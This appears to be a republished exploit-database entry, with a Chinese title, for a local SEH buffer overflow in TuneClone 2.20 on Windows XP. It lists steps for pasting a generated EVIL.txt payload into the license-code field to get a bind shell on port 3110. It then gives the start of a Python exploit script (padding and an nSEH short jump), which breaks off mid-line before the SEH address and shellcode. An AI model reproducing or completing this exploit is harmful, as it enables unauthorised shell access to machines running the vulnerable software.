Tuneclone_2.20_本地SEH緩衝區溢出漏洞

# Tuneclone 2.20 本地SEH緩衝區溢出漏洞
==EXP==

# Exploit Title: TuneClone Local Seh Exploit
# Date: 19.06.2019
# Vendor Homepage: http://www.tuneclone.com/
# Software Link:   http://www.tuneclone.com/tuneclone_setup.exe
# Exploit Author: Achilles
# Tested Version: 2.20
# Tested on: Windows XP SP3 EN
            
# 1.- Run python code : TuneClone.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open TuneClone and press Help and 'Enter License Code'
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
# 5.- Click 'OK' and you will have a bind shell port 3110.
# 6.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

buffer = "\x41" * 1056
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh  =  struct.pack('